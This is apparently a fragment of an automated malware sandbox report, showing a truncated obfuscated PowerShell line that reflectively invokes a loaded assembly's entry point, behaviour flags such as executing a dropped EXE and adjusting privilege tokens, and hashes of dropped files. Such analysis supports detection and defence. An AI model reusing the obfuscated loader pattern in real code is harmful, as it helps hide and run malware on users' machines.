$LWzZt::$JyAEw2($jYxZq);$YsjKF = $jddfa.EntryPoint;$YsjKF.$JyAEw0($null, (, [string[]] ($PwBzY)))4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3452
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
1.8MB
MD57873612dddd9152d70d892427bc45ef0
SHA1ab9079a43a784471ca31c4f0a34b698d99334dfa
SHA256203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf
SHA512d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083
-
Filesize
52KB
MD59ef28981adcbf4360de5f11b8f4ecff9
SHA1219aaa1a617b1dfa36f3928bd1020e410666134f
SHA2568caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a
SHA512ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c
-
Filesize
162KB
MD5a366d6623c14c377c682d6b5451575e6
SHA1a8894fcfb3aa06ad073b1f581b2e749b54827971
SHA2567ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6
SHA512cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11